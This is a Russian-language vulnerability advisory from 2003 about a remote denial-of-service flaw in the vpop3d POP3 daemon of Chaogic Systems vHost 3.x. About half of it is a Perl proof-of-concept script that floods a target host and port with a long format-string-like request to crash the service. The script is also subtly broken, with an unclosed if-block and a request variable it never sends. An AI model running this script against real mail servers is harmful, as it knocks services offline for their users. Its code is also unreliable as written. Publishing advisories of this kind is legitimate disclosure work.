Security Lab

Удаленное переполнение буфера в в vHost в POP3 демоне

Дата публикации:21.08.2003
Всего просмотров:1247
Опасность:
Средняя
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Отказ в обслуживании
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Chaogic Systems vHost 3.x
Описание: Отказ в обслуживании обнаружен в vHost в POP3 демоне. Удаленный пользователь может аварийно завершить работу POP3 службы.

Удаленный пользователь может послать длинный запрос к vpop3d POP3 серверу, чтобы аварийно завершить работу демона. Перед аварийным завершением работы, демон выдаст следующую ошибку:

"-ERR POP3 Server Abnormal Shutdown: Timeout waiting for command from client"

Уязвимость обнаружена в vHost POP Server 3.05r3 Способов устранения обнаруженной уязвимости не существует в настоящее время. Эксплоит:

#!/usr/bin/perl

#vpop3d Denial Of Service..
#Proof of Concept script..
#Deadbeat, uk2sec..
#e: deadbeat@sdf.lonestar.org
#e: daniels@legend.co.uk

use IO::Socket;
$host = $ARGV[0];
$port = $ARGV[1];
if(!$ARGV[1]){
        die "usage: perl $0 <host> <port>\n";
 
$dos = "%s%s"x5000;
$req = "USER $dos";
$sox = IO::Socket::INET->new(
        Proto=>"tcp",
        PeerPort=>$port,
        PeerAddr=>$host
)or die "can't connect to $host : $port\n";
sleep 2;
print $sox $dos;
sleep 1;
print "done..vpop3d should lock now :)\n";

Ссылки: Vhost-3.05rc3 DOS..